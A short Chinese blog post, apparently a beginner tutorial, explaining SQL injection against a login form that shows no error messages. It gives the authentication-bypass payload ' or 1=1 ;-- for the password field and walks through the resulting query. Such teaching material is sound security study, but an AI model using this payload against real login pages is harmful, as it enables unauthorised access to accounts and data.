Blind SQLi

Posted 2023-03-26 野荷

Blind SQLi

SQL盲注

sql盲注用于一些我们看不到回显的登陆页面，我们得到很少甚至没有反馈来确认注入的查询是否真的成功，这是因为错误消息已被禁用，但是无论如何SQL注入仍然有效。

当我们看到这样的页面

 

 而且url中没有？时，这种实际上相当于：

select * from users where username=\'%username%\' and password=\'%password%\' LIMIT 1;

这时我们可以尝试绕过身份验证

在Username下输入admin，在Password下输入 ’ or 1=1 ;--

这相当于：

select * from users where username=\'admin\' and password=\'\' or 1=1 ;--\' LIMIT 1;
等于
select * from users where username=\'admin\' and password=\'\' or 1=1;

因为 1=1 是一个真正的陈述，并且我们使用了 OR 运算符， 这将始终导致查询返回为 true，这满足 数据库发现有效的 Web 应用程序逻辑 用户名/密码组合，并且应允许该访问。

最终我们便绕过了身份验证并登录

本文来自博客园，作者：野荷，转载请注明原文链接：https://www.cnblogs.com/jhinjax/p/17258244.html